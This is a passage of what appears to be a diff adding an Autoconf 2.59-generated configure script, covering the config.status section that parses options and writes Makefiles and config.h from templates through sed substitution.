1q`" >&5 +echo >&5 +_ACEOF + +# Files that config.status was made for. +if test -n "$ac_config_files"; then + echo "config_files=\"$ac_config_files\"" >>$CONFIG_STATUS +fi + +if test -n "$ac_config_headers"; then + echo "config_headers=\"$ac_config_headers\"" >>$CONFIG_STATUS +fi + +if test -n "$ac_config_links"; then + echo "config_links=\"$ac_config_links\"" >>$CONFIG_STATUS +fi + +if test -n "$ac_config_commands"; then + echo "config_commands=\"$ac_config_commands\"" >>$CONFIG_STATUS +fi + +cat >>$CONFIG_STATUS <<\_ACEOF + +ac_cs_usage="\ +\`$as_me' instantiates files from templates according to the +current configuration. + +Usage: $0 [OPTIONS] [FILE]... + + -h, --help print this help, then exit + -V, --version print version number, then exit + -q, --quiet do not print progress messages + -d, --debug don't remove temporary files + --recheck update $as_me by reconfiguring in the same conditions + --file=FILE[:TEMPLATE] + instantiate the configuration file FILE + --header=FILE[:TEMPLATE] + instantiate the configuration header FILE + +Configuration files: +$config_files + +Configuration headers: +$config_headers + +Configuration commands: +$config_commands + +Report bugs to ." +_ACEOF + +cat >>$CONFIG_STATUS <<_ACEOF +ac_cs_version="\\ +config.status +configured by $0, generated by GNU Autoconf 2.59, + with options \\"`echo "$ac_configure_args" | sed 's/[\\""\`\$]/\\\\&/g'`\\" + +Copyright (C) 2003 Free Software Foundation, Inc. +This config.status script is free software; the Free Software Foundation +gives unlimited permission to copy, distribute and modify it." +srcdir=$srcdir +INSTALL="$INSTALL" +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF +# If no file are specified by the user, then we need to provide default +# value. By we need to know if files were specified by the user. +ac_need_defaults=: +while test $# != 0 +do + case $1 in + --*=*) + ac_option=`expr "x$1" : 'x\([^=]*\)='` + ac_optarg=`expr "x$1" : 'x[^=]*=\(.*\)'` + ac_shift=: + ;; + -*) + ac_option=$1 + ac_optarg=$2 + ac_shift=shift + ;; + *) # This is not an option, so the user has probably given explicit + # arguments. + ac_option=$1 + ac_need_defaults=false;; + esac + + case $ac_option in + # Handling of the options. +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF + -recheck | --recheck | --rechec | --reche | --rech | --rec | --re | --r) + ac_cs_recheck=: ;; + --version | --vers* | -V ) + echo "$ac_cs_version"; exit 0 ;; + --he | --h) + # Conflict between --help and --header + { { echo "$as_me:$LINENO: error: ambiguous option: $1 +Try \`$0 --help' for more information." >&5 +echo "$as_me: error: ambiguous option: $1 +Try \`$0 --help' for more information." >&2;} + { (exit 1); exit 1; }; };; + --help | --hel | -h ) + echo "$ac_cs_usage"; exit 0 ;; + --debug | --d* | -d ) + debug=: ;; + --file | --fil | --fi | --f ) + $ac_shift + CONFIG_FILES="$CONFIG_FILES $ac_optarg" + ac_need_defaults=false;; + --header | --heade | --head | --hea ) + $ac_shift + CONFIG_HEADERS="$CONFIG_HEADERS $ac_optarg" + ac_need_defaults=false;; + -q | -quiet | --quiet | --quie | --qui | --qu | --q \ + | -silent | --silent | --silen | --sile | --sil | --si | --s) + ac_cs_silent=: ;; + + # This is an error. + -*) { { echo "$as_me:$LINENO: error: unrecognized option: $1 +Try \`$0 --help' for more information." >&5 +echo "$as_me: error: unrecognized option: $1 +Try \`$0 --help' for more information." >&2;} + { (exit 1); exit 1; }; } ;; + + *) ac_config_targets="$ac_config_targets $1" ;; + + esac + shift +done + +ac_configure_extra_args= + +if $ac_cs_silent; then + exec 6>/dev/null + ac_configure_extra_args="$ac_configure_extra_args --silent" +fi + +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF +if \$ac_cs_recheck; then + echo "running $SHELL $0 " $ac_configure_args \$ac_configure_extra_args " --no-create --no-recursion" >&6 + exec $SHELL $0 $ac_configure_args \$ac_configure_extra_args --no-create --no-recursion +fi + +_ACEOF + +cat >>$CONFIG_STATUS <<_ACEOF +# +# INIT-COMMANDS section. +# + + + +_ACEOF + + + +cat >>$CONFIG_STATUS <<\_ACEOF +for ac_config_target in $ac_config_targets +do + case "$ac_config_target" in + # Handling of arguments. + "Makefile" ) CONFIG_FILES="$CONFIG_FILES Makefile" ;; + "src/Makefile" ) CONFIG_FILES="$CONFIG_FILES src/Makefile" ;; + "default-1" ) CONFIG_COMMANDS="$CONFIG_COMMANDS default-1" ;; + "config.h" ) CONFIG_HEADERS="$CONFIG_HEADERS config.h" ;; + *) { { echo "$as_me:$LINENO: error: invalid argument: $ac_config_target" >&5 +echo "$as_me: error: invalid argument: $ac_config_target" >&2;} + { (exit 1); exit 1; }; };; + esac +done + +# If the user did not use the arguments to specify the items to instantiate, +# then the envvar interface is used. Set only those that are not. +# We use the long form for the default assignment because of an extremely +# bizarre bug on SunOS 4.1.3. +if $ac_need_defaults; then + test "${CONFIG_FILES+set}" = set || CONFIG_FILES=$config_files + test "${CONFIG_HEADERS+set}" = set || CONFIG_HEADERS=$config_headers + test "${CONFIG_COMMANDS+set}" = set || CONFIG_COMMANDS=$config_commands +fi + +# Have a temporary directory for convenience. Make it in the build tree +# simply because there is no reason to put it here, and in addition, +# creating and moving files from /tmp can sometimes cause problems. +# Create a temporary directory, and hook for its removal unless debugging. +$debug || +{ + trap 'exit_status=$?; rm -rf $tmp && exit $exit_status' 0 + trap '{ (exit 1); exit 1; }' 1 2 13 15 +} + +# Create a (secure) tmp directory for tmp files. + +{ + tmp=`(umask 077 && mktemp -d -q "./confstatXXXXXX") 2>/dev/null` && + test -n "$tmp" && test -d "$tmp" +} || +{ + tmp=./confstat$$-$RANDOM + (umask 077 && mkdir $tmp) +} || +{ + echo "$me: cannot create a temporary directory in ." >&2 + { (exit 1); exit 1; } +} + +_ACEOF + +cat >>$CONFIG_STATUS <<_ACEOF + +# +# CONFIG_FILES section. +# + +# No need to generate the scripts if there are no CONFIG_FILES. +# This happens for instance when ./config.status config.h +if test -n "\$CONFIG_FILES"; then + # Protect against being on the right side of a sed subst in config.status. + sed 's/,@/@@/; s/@,/@@/; s/,;t t\$/@;t t/; /@;t t\$/s/[\\\\&,]/\\\\&/g; + s/@@/,@/; s/@@/@,/; s/@;t t\$/,;t t/' >\$tmp/subs.sed <<\\CEOF +s,@SHELL@,$SHELL,;t t +s,@PATH_SEPARATOR@,$PATH_SEPARATOR,;t t +s,@PACKAGE_NAME@,$PACKAGE_NAME,;t t +s,@PACKAGE_TARNAME@,$PACKAGE_TARNAME,;t t +s,@PACKAGE_VERSION@,$PACKAGE_VERSION,;t t +s,@PACKAGE_STRING@,$PACKAGE_STRING,;t t +s,@PACKAGE_BUGREPORT@,$PACKAGE_BUGREPORT,;t t +s,@exec_prefix@,$exec_prefix,;t t +s,@prefix@,$prefix,;t t +s,@program_transform_name@,$program_transform_name,;t t +s,@bindir@,$bindir,;t t +s,@sbindir@,$sbindir,;t t +s,@libexecdir@,$libexecdir,;t t +s,@datadir@,$datadir,;t t +s,@sysconfdir@,$sysconfdir,;t t +s,@sharedstatedir@,$sharedstatedir,;t t +s,@localstatedir@,$localstatedir,;t t +s,@libdir@,$libdir,;t t +s,@includedir@,$includedir,;t t +s,@oldincludedir@,$oldincludedir,;t t +s,@infodir@,$infodir,;t t +s,@mandir@,$mandir,;t t +s,@build_alias@,$build_alias,;t t +s,@host_alias@,$host_alias,;t t +s,@target_alias@,$target_alias,;t t +s,@DEFS@,$DEFS,;t t +s,@ECHO_C@,$ECHO_C,;t t +s,@ECHO_N@,$ECHO_N,;t t +s,@ECHO_T@,$ECHO_T,;t t +s,@LIBS@,$LIBS,;t t +s,@INSTALL_PROGRAM@,$INSTALL_PROGRAM,;t t +s,@INSTALL_SCRIPT@,$INSTALL_SCRIPT,;t t +s,@INSTALL_DATA@,$INSTALL_DATA,;t t +s,@PACKAGE@,$PACKAGE,;t t +s,@VERSION@,$VERSION,;t t +s,@ACLOCAL@,$ACLOCAL,;t t +s,@AUTOCONF@,$AUTOCONF,;t t +s,@AUTOMAKE@,$AUTOMAKE,;t t +s,@AUTOHEADER@,$AUTOHEADER,;t t +s,@MAKEINFO@,$MAKEINFO,;t t +s,@SET_MAKE@,$SET_MAKE,;t t +s,@MAINTAINER_MODE_TRUE@,$MAINTAINER_MODE_TRUE,;t t +s,@MAINTAINER_MODE_FALSE@,$MAINTAINER_MODE_FALSE,;t t +s,@MAINT@,$MAINT,;t t +s,@CC@,$CC,;t t +s,@CFLAGS@,$CFLAGS,;t t +s,@LDFLAGS@,$LDFLAGS,;t t +s,@CPPFLAGS@,$CPPFLAGS,;t t +s,@ac_ct_CC@,$ac_ct_CC,;t t +s,@EXEEXT@,$EXEEXT,;t t +s,@OBJEXT@,$OBJEXT,;t t +s,@CPP@,$CPP,;t t +s,@EGREP@,$EGREP,;t t +s,@PKG_CONFIG@,$PKG_CONFIG,;t t +s,@PACKAGE_CFLAGS@,$PACKAGE_CFLAGS,;t t +s,@PACKAGE_LIBS@,$PACKAGE_LIBS,;t t +s,@LIBOBJS@,$LIBOBJS,;t t +s,@LTLIBOBJS@,$LTLIBOBJS,;t t +CEOF + +_ACEOF + + cat >>$CONFIG_STATUS <<\_ACEOF + # Split the substitutions into bite-sized pieces for seds with + # small command number limits, like on Digital OSF/1 and HP-UX. + ac_max_sed_lines=48 + ac_sed_frag=1 # Number of current file. + ac_beg=1 # First line for current file. + ac_end=$ac_max_sed_lines # Line after last line for current file. + ac_more_lines=: + ac_sed_cmds= + while $ac_more_lines; do + if test $ac_beg -gt 1; then + sed "1,${ac_beg}d; ${ac_end}q" $tmp/subs.sed >$tmp/subs.frag + else + sed "${ac_end}q" $tmp/subs.sed >$tmp/subs.frag + fi + if test ! -s $tmp/subs.frag; then + ac_more_lines=false + else + # The purpose of the label and of the branching condition is to + # speed up the sed processing (if there are no `@' at all, there + # is no need to browse any of the substitutions). + # These are the two extra sed commands mentioned above. + (echo ':t + /@[a-zA-Z_][a-zA-Z_0-9]*@/!b' && cat $tmp/subs.frag) >$tmp/subs-$ac_sed_frag.sed + if test -z "$ac_sed_cmds"; then + ac_sed_cmds="sed -f $tmp/subs-$ac_sed_frag.sed" + else + ac_sed_cmds="$ac_sed_cmds | sed -f $tmp/subs-$ac_sed_frag.sed" + fi + ac_sed_frag=`expr $ac_sed_frag + 1` + ac_beg=$ac_end + ac_end=`expr $ac_end + $ac_max_sed_lines` + fi + done + if test -z "$ac_sed_cmds"; then + ac_sed_cmds=cat + fi +fi # test -n "$CONFIG_FILES" + +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF +for ac_file in : $CONFIG_FILES; do test "x$ac_file" = x: && continue + # Support "outfile[:infile[:infile...]]", defaulting infile="outfile.in". + case $ac_file in + - | *:- | *:-:* ) # input from stdin + cat >$tmp/stdin + ac_file_in=`echo "$ac_file" | sed 's,[^:]*:,,'` + ac_file=`echo "$ac_file" | sed 's,:.*,,'` ;; + *:* ) ac_file_in=`echo "$ac_file" | sed 's,[^:]*:,,'` + ac_file=`echo "$ac_file" | sed 's,:.*,,'` ;; + * ) ac_file_in=$ac_file.in ;; + esac + + # Compute @srcdir@, @top_srcdir@, and @INSTALL@ for subdirectories. + ac_dir=`(dirname "$ac_file") 2>/dev/null || +$as_expr X"$ac_file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$ac_file" : 'X\(//\)[^/]' \| \ + X"$ac_file" : 'X\(//\)$' \| \ + X"$ac_file" : 'X\(/\)' \| \ + . : '\(.\)' 2>/dev/null || +echo X"$ac_file" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/; q; } + /^X\(\/\/\)[^/].*/{ s//\1/; q; } + /^X\(\/\/\)$/{ s//\1/; q; } + /^X\(\/\).*/{ s//\1/; q; } + s/.*/./; q'` + { if $as_mkdir_p; then + mkdir -p "$ac_dir" + else + as_dir="$ac_dir" + as_dirs= + while test ! -d "$as_dir"; do + as_dirs="$as_dir $as_dirs" + as_dir=`(dirname "$as_dir") 2>/dev/null || +$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_dir" : 'X\(//\)[^/]' \| \ + X"$as_dir" : 'X\(//\)$' \| \ + X"$as_dir" : 'X\(/\)' \| \ + . : '\(.\)' 2>/dev/null || +echo X"$as_dir" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/; q; } + /^X\(\/\/\)[^/].*/{ s//\1/; q; } + /^X\(\/\/\)$/{ s//\1/; q; } + /^X\(\/\).*/{ s//\1/; q; } + s/.*/./; q'` + done + test ! -n "$as_dirs" || mkdir $as_dirs + fi || { { echo "$as_me:$LINENO: error: cannot create directory \"$ac_dir\"" >&5 +echo "$as_me: error: cannot create directory \"$ac_dir\"" >&2;} + { (exit 1); exit 1; }; }; } + + ac_builddir=. + +if test "$ac_dir" != .; then + ac_dir_suffix=/`echo "$ac_dir" | sed 's,^\.[\\/],,'` + # A "../" for each directory in $ac_dir_suffix. + ac_top_builddir=`echo "$ac_dir_suffix" | sed 's,/[^\\/]*,../,g'` +else + ac_dir_suffix= ac_top_builddir= +fi + +case $srcdir in + .) # No --srcdir option. We are building in place. + ac_srcdir=. + if test -z "$ac_top_builddir"; then + ac_top_srcdir=. + else + ac_top_srcdir=`echo $ac_top_builddir | sed 's,/$,,'` + fi ;; + [\\/]* | ?:[\\/]* ) # Absolute path. + ac_srcdir=$srcdir$ac_dir_suffix; + ac_top_srcdir=$srcdir ;; + *) # Relative path. + ac_srcdir=$ac_top_builddir$srcdir$ac_dir_suffix + ac_top_srcdir=$ac_top_builddir$srcdir ;; +esac + +# Do not use `cd foo && pwd` to compute absolute paths, because +# the directories may not exist. +case `pwd` in +.) ac_abs_builddir="$ac_dir";; +*) + case "$ac_dir" in + .) ac_abs_builddir=`pwd`;; + [\\/]* | ?:[\\/]* ) ac_abs_builddir="$ac_dir";; + *) ac_abs_builddir=`pwd`/"$ac_dir";; + esac;; +esac +case $ac_abs_builddir in +.) ac_abs_top_builddir=${ac_top_builddir}.;; +*) + case ${ac_top_builddir}. in + .) ac_abs_top_builddir=$ac_abs_builddir;; + [\\/]* | ?:[\\/]* ) ac_abs_top_builddir=${ac_top_builddir}.;; + *) ac_abs_top_builddir=$ac_abs_builddir/${ac_top_builddir}.;; + esac;; +esac +case $ac_abs_builddir in +.) ac_abs_srcdir=$ac_srcdir;; +*) + case $ac_srcdir in + .) ac_abs_srcdir=$ac_abs_builddir;; + [\\/]* | ?:[\\/]* ) ac_abs_srcdir=$ac_srcdir;; + *) ac_abs_srcdir=$ac_abs_builddir/$ac_srcdir;; + esac;; +esac +case $ac_abs_builddir in +.) ac_abs_top_srcdir=$ac_top_srcdir;; +*) + case $ac_top_srcdir in + .) ac_abs_top_srcdir=$ac_abs_builddir;; + [\\/]* | ?:[\\/]* ) ac_abs_top_srcdir=$ac_top_srcdir;; + *) ac_abs_top_srcdir=$ac_abs_builddir/$ac_top_srcdir;; + esac;; +esac + + + case $INSTALL in + [\\/$]* | ?:[\\/]* ) ac_INSTALL=$INSTALL ;; + *) ac_INSTALL=$ac_top_builddir$INSTALL ;; + esac + + if test x"$ac_file" != x-; then + { echo "$as_me:$LINENO: creating $ac_file" >&5 +echo "$as_me: creating $ac_file" >&6;} + rm -f "$ac_file" + fi + # Let's still pretend it is `configure' which instantiates (i.e., don't + # use $as_me), people would be surprised to read: + # /* config.h. Generated by config.status. */ + if test x"$ac_file" = x-; then + configure_input= + else + configure_input="$ac_file. " + fi + configure_input=$configure_input"Generated from `echo $ac_file_in | + sed 's,.*/,,'` by configure." + + # First look for the input files in the build tree, otherwise in the + # src tree. + ac_file_inputs=`IFS=: + for f in $ac_file_in; do + case $f in + -) echo $tmp/stdin ;; + [\\/$]*) + # Absolute (can't be DOS-style, as IFS=:) + test -f "$f" || { { echo "$as_me:$LINENO: error: cannot find input file: $f" >&5 +echo "$as_me: error: cannot find input file: $f" >&2;} + { (exit 1); exit 1; }; } + echo "$f";; + *) # Relative + if test -f "$f"; then + # Build tree + echo "$f" + elif test -f "$srcdir/$f"; then + # Source tree + echo "$srcdir/$f" + else + # /dev/null tree + { { echo "$as_me:$LINENO: error: cannot find input file: $f" >&5 +echo "$as_me: error: cannot find input file: $f" >&2;} + { (exit 1); exit 1; }; } + fi;; + esac + done` || { (exit 1); exit 1; } +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF + sed "$ac_vpsub +$extrasub +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF +:t +/@[a-zA-Z_][a-zA-Z_0-9]*@/!b +s,@configure_input@,$configure_input,;t t +s,@srcdir@,$ac_srcdir,;t t +s,@abs_srcdir@,$ac_abs_srcdir,;t t +s,@top_srcdir@,$ac_top_srcdir,;t t +s,@abs_top_srcdir@,$ac_abs_top_srcdir,;t t +s,@builddir@,$ac_builddir,;t t +s,@abs_builddir@,$ac_abs_builddir,;t t +s,@top_builddir@,$ac_top_builddir,;t t +s,@abs_top_builddir@,$ac_abs_top_builddir,;t t +s,@INSTALL@,$ac_INSTALL,;t t +" $ac_file_inputs | (eval "$ac_sed_cmds") >$tmp/out + rm -f $tmp/stdin + if test x"$ac_file" != x-; then + mv $tmp/out $ac_file + else + cat $tmp/out + rm -f $tmp/out + fi + +done +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF + +# +# CONFIG_HEADER section. +# + +# These sed commands are passed to sed as "A NAME B NAME C VALUE D", where +# NAME is the cpp macro being defined and VALUE is the value it is being given. +# +# ac_d sets the value in "#define NAME VALUE" lines. +ac_dA='s,^\([ ]*\)#\([ ]*define[ ][ ]*\)' +ac_dB='[ ].*$,\1#\2' +ac_dC=' ' +ac_dD=',;t' +# ac_u turns "#undef NAME" without trailing blanks into "#define NAME VALUE". +ac_uA='s,^\([ ]*\)#\([ ]*\)undef\([ ][ ]*\)' +ac_uB='$,\1#\2define\3' +ac_uC=' ' +ac_uD=',;t' + +for ac_file in : $CONFIG_HEADERS; do test "x$ac_file" = x: && continue + # Support "outfile[:infile[:infile...]]", defaulting infile="outfile.in". + case $ac_file in + - | *:- | *:-:* ) # input from stdin + cat >$tmp/stdin + ac_file_in=`echo "$ac_file" | sed 's,[^:]*:,,'` + ac_file=`echo "$ac_file" | sed 's,:.*,,'` ;; + *:* ) ac_file_in=`echo "$ac_file" | sed 's,[^:]*:,,'` + ac_file=`echo "$ac_file" | sed 's,:.*,,'` ;; + * ) ac_file_in=$ac_file.in ;; + esac + + test x"$ac_file" != x- && { echo "$as_me:$LINENO: creating $ac_file" >&5 +echo "$as_me: creating $ac_file" >&6;} + + # First look for the input files in the build tree, otherwise in the + # src tree. + ac_file_inputs=`IFS=: + for f in $ac_file_in; do + case $f in + -) echo $tmp/stdin ;; + [\\/$]*) + # Absolute (can't be DOS-style, as IFS=:) + test -f "$f" || { { echo "$as_me:$LINENO: error: cannot find input file: $f" >&5 +echo "$as_me: error: cannot find input file: $f" >&2;} + { (exit 1); exit 1; }; } + # Do quote $f, to prevent DOS paths from being IFS'd. + echo "$f";; + *) # Relative + if test -f "$f"; then + # Build tree + echo "$f" + elif test -f "$srcdir/$f"; then + # Source tree + echo "$srcdir/$f" + else + # /dev/null tree + { { echo "$as_me:$LINENO: error: cannot find input file: $f" >&5 +echo "$as_me: error: cannot find input file: $f" >&2;} + { (exit 1); exit 1; }; } + fi;; + esac + done` || { (exit 1); exit 1; } + # Remove the trailing spaces. + sed 's/[ ]*$//' $ac_file_inputs >$tmp/in + +_ACEOF + +# Transform confdefs.h into two sed scripts, `conftest.defines' and +# `conftest.undefs', that substitutes the proper values into +# config.h.in to produce config.h. The first handles `#define' +# templates, and the second `#undef' templates. +# And first: Protect against being on the right side of a sed subst in +# config.status. Protect against being in an unquoted here document +# in config.status. +rm -f conftest.defines conftest.undefs +# Using a here document instead of a string reduces the quoting nightmare. +# Putting comments in sed scripts is not portable. +# +# `end' is used to avoid that the second main sed command (meant for +# 0-ary CPP macros) applies to n-ary macro definitions. +# See the Autoconf documentation for `clear'. +cat >confdef2sed.sed <<\_ACEOF +s/[\\&,]/\\&/g +s,[\\$`],\\&,g +t clear +: clear +s,^[ ]*#[ ]*define[ ][ ]*\([^ (][^ (]*\)\(([^)]*)\)[ ]*\(.*\)$,${ac_dA}\1${ac_dB}\1\2${ac_dC}\3${ac_dD},gp +t end +s,^[ ]*#[ ]*define[ ][ ]*\([^ ][^ ]*\)[ ]*\(.*\)$,${ac_dA}\1${ac_dB}\1${ac_dC}\2${ac_dD},gp +: end +_ACEOF +# If some macros were called several times there might be several times +# the same #defines, which is useless. Nevertheless, we may not want to +# sort them, since we want the *last* AC-DEFINE to be honored. +uniq confdefs.h | sed -n -f confdef2sed.sed >conftest.defines +sed 's/ac_d/ac_u/g' conftest.defines >conftest.undefs +rm -f confdef2sed.sed + +# This sed command replaces #undef with comments. This is necessary, for +# example, in the case of _POSIX_SOURCE, which is predefined and required +# on some systems where configure will not decide to define it. +cat >>conftest.undefs <<\_ACEOF +s,^[ ]*#[ ]*undef[ ][ ]*[a-zA-Z_][a-zA-Z_0-9]*,/* & */, +_ACEOF + +# Break up conftest.defines because some shells have a limit on the size +# of here documents, and old seds have small limits too (100 cmds). +echo ' # Handle all the #define templates only if necessary.' >>$CONFIG_STATUS +echo ' if grep "^[ ]*#[ ]*define" $tmp/in >/dev/null; then' >>$CONFIG_STATUS +echo ' # If there are no defines, we may have an empty if/fi' >>$CONFIG_STATUS +echo ' :' >>$CONFIG_STATUS +rm -f conftest.tail +while grep . conftest.defines >/dev/null +do + # Write a limited-size here document to $tmp/defines.sed. + echo ' cat >$tmp/defines.sed <>$CONFIG_STATUS + # Speed up: don't consider the non `#define' lines. + echo '/^[ ]*#[ ]*define/!b' >>$CONFIG_STATUS + # Work around the forget-to-reset-the-flag bug. + echo 't clr' >>$CONFIG_STATUS + echo ': clr' >>$CONFIG_STATUS + sed ${ac_max_here_lines}q conftest.defines >>$CONFIG_STATUS + echo 'CEOF + sed -f $tmp/defines.sed $tmp/in >$tmp/out + rm -f $tmp/in + mv $tmp/out $tmp/in +' >>$CONFIG_STATUS + sed 1,${ac_max_here_lines}d conftest.defines >conftest.tail + rm -f conftest.defines + mv conftest.tail conftest.defines +done +rm -f conftest.defines +echo ' fi # grep' >>$CONFIG_STATUS +echo >>$CONFIG_STATUS + +# Break up conftest.undefs because some shells have a limit on the size +# of here documents, and old seds have small limits too (100 cmds). +echo ' # Handle all the #undef templates' >>$CONFIG_STATUS +rm -f conftest.tail +while grep . conftest.undefs >/dev/null +do + # Write a limited-size here document to $tmp/undefs.sed. + echo ' cat >$tmp/undefs.sed <>$CONFIG_STATUS + # Speed up: don't consider the non `#undef' + echo '/^[ ]*#[ ]*undef/!b' >>$CONFIG_STATUS + # Work around the forget-to-reset-the-flag bug. + echo 't clr' >>$CONFIG_STATUS + echo ': clr' >>$CONFIG_STATUS + sed ${ac_max_here_lines}q conftest.undefs >>$CONFIG_STATUS + echo 'CEOF + sed -f $tmp/undefs.sed $tmp/in >$tmp/out + rm -f $tmp/in + mv $tmp/out $tmp/in +' >>$CONFIG_STATUS + sed 1,${ac_max_here_lines}d conftest.undefs >conftest.tail + rm -f conftest.undefs + mv conftest.tail conftest.undefs +done +rm -f conftest.undefs + +cat >>$CONFIG_STATUS <<\_ACEOF + # Let's still pretend it is `configure' which instantiates (i.e., don't + # use $as_me), people would be surprised to read: + # /* config.h. Generated by config.status. */ + if test x"$ac_file" = x-; then + echo "/* Generated by configure. */" >$tmp/config.h + else + echo "/* $ac_file. Generated by configure. */" >$tmp/config.h + fi + cat $tmp/in >>$tmp/config.h + rm -f $tmp/in + if test x"$ac_file" != x-; then + if diff $ac_file $tmp/config.h >/dev/null 2>&1; then + { echo "$as_me:$LINENO: $ac_file is unchanged" >&5 +echo "$as_me: $ac_file is unchanged" >&6;} + else + ac_dir=`(dirname "$ac_file") 2>/dev/null || +$as_expr X"$ac_file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$ac_file" : 'X\(//\)[^/]' \| \ + X"$ac_file" : 'X\(//\)$' \| \ + X"$ac_file" : 'X\(/\)' \| \ + . : '\(.\)' 2>/dev/null || +echo X"$ac_file" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/; q; } + /^X\(\/\/\)[^/].*/{ s//\1/; q; } + /^X\(\/\/\)$/{ s//\1/; q; } + /^X\(\/\).*/{ s//\1/; q; } + s/.*/./; q'` + { if $as_mkdir_p; then + mkdir -p "$ac_dir" + else + as_dir="$ac_dir" + as_dirs= + while test ! -d "$as_dir"; do + as_dirs="$as_dir $as_dirs" + as_dir=`(dirname "$as_dir") 2>/dev/null || +$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_dir" : 'X\(//\)[^/]' \| \ + X"$as_dir" : 'X\(//\)$' \| \ + X"$as_dir" : 'X\(/\)' \| \ + . : '\(.\)' 2>/dev/null || +echo X"$as_dir" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/; q; } + /^X\(\/\/\)[^/].*/{ s//\1/; q; } + /^X\(\/\/\)$/{ s//\1/; q; } + /^X\(\/\).*/{ s//\1/; q; } + s/.*/./; q'` + done + test ! -n "$as_dirs" || mkdir $as_dirs + fi || { { echo "$as_me:$LINENO: error: cannot create directory \"$ac_dir\"" >&5 +echo "$as_me: error: cannot create directory \"$ac_dir\"" >&2;} + { (exit 1); exit 1; }; }; } + + rm -f $ac_file + mv $tmp/config.h $ac_file + fi + else + cat $tmp/config.h + rm -f $tmp/config.h + fi +done +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF + +# +# CONFIG_COMMANDS section. +# +for ac_file in : $CONFIG_COMMANDS; do test "x$ac_file" = x: && continue + ac_dest=`echo "$ac_file" | sed 's,:.*,,'` + ac_source=`echo "$ac_file" | sed 's,[^:]*:,,'` + ac_dir=`(dirname "$ac_dest") 2>/dev/null || +$as_expr X"$ac_dest" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$ac_dest" : 'X\(//\)[^/]' \| \ + X"$ac_dest" : 'X\(//\)$' \| \ + X"$ac_dest" : 'X\(/\)' \| \ + . : '\(.\)' 2>/dev/null || +echo X"$ac_dest" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/; q; } + /^X\(\/\/\)[^/].*/{ s//\1/; q; } + /^X\(\/\/\)$/{ s//\1/; q; } + /^X\(\/\).*/{ s//\1/; q; } + s/.*/./; q'` + { if $as_mkdir_p; then + mkdir -p "$ac_dir" + else + as_dir="$ac_dir" + as_dirs= + while test ! -d "$as_dir"; do + as_dirs="$as_dir $as_dirs" + as_dir=`(dirname "$as_dir") 2>/dev/null || +$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_dir" : 'X\(//\)[^/]' \| \ + X"$as_dir" : 'X\(//\)$' \| \ + X"$as_dir" : 'X\(/\)' \| \ + . : '\(.\)' 2>/dev/null || +echo X"$as_dir" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/; q; } + /^X\(\/\/\)[^/].*/{ s//\1/; q; } + /^X\(\/\/\)$/{ s//\1/; q; } + /^X\(\/\).*/{ s//\1/; q; } + s/.*/./; q'` + done + test ! -n "$as_dirs" || mkdir $as_dirs + fi || { { echo "$as_me:$LINENO: error: cannot create directory \"$ac_dir\"" >&5 +echo "$as_me: error: cannot create directory \"$ac_dir\"" >&2;} + { (exit 1); exit 1; }; }; } + + ac_builddir=. + +if test "$ac_dir" != .; then + ac_dir_suffix=/`echo "$ac_dir" | sed 's,^\.[\\/],,'` + # A "../" for each directory in $ac_dir_suffix. + ac_top_builddir=`echo "$ac_dir_suffix" | sed 's,/[^\\/]*,../,g'` +else + ac_dir_suffix= ac_top_builddir= +fi + +case $srcdir in + .) # No --srcdir option. We are building in place. + ac_srcdir=. + if test -z "$ac_top_builddir"; then + ac_top_srcdir=. + else + ac_top_srcdir=`echo $ac_top_builddir | sed 's,/$,,'` + fi ;; + [\\/]* | ?:[\\/]* ) # Absolute path. + ac_srcdir=$srcdir$ac_dir_suffix; + ac_top_srcdir=$srcdir ;; + *) # Relative path. + ac_srcdir=$ac_top_builddir$srcdir$ac_dir_suffix + ac_top_srcdir=$ac_top_builddir$srcdir ;; +esac + +# Do not use `cd foo && pwd` to compute absolute paths, because +# the directories may not exist. +case `pwd` in +.) ac_abs_builddir="$ac_dir";; +*) + case "$ac_dir" in + .) ac_abs_builddir=`pwd`;; + [\\/]* | ?:[\\/]* ) ac_abs_builddir="$ac_dir";; + *) ac_abs_builddir=`pwd`/"$ac_dir";; + esac;; +esac +case $ac_abs_builddir in +.) ac_abs_top_builddir=${ac_top_builddir}.;; +*) + case ${ac_top_builddir}. in + .) ac_abs_top_builddir=$ac_abs_builddir;; + [\\/]* | ?:[\\/]* ) ac_abs_top_builddir=${ac_top_builddir}.;; + *) ac_abs_top_builddir=$ac_abs_builddir/${ac_top_builddir}.;; + esac;; +esac +case $ac_abs_builddir in +.) ac_abs_srcdir=$ac_srcdir;; +*) + case $ac_srcdir in + .) ac_abs_srcdir=$ac_abs_builddir;; + [\\/]* | ?:[\\/]* ) ac_abs_srcdir=$ac_srcdir;; + *) ac_abs_srcdir=$ac_abs_builddir/$ac_srcdir;; + esac;; +esac +case $ac_abs_builddir in +.) ac_abs_top_srcdir=$ac_top_srcdir;; +*) + case $ac_top_srcdir in + .) ac_abs_top_srcdir=$ac_abs_builddir;; + [\\/]* | ?:[\\/]* ) ac_abs_top_srcdir=$ac_top_srcdir;; + *) ac_abs_top_srcdir=$ac_abs_builddir/$ac_top_srcdir;; + esac;; +esac + + + { echo "$as_me:$LINENO: executing $ac_dest commands" >&5 +echo "$as_me: executing $ac_dest commands" >&6;} + 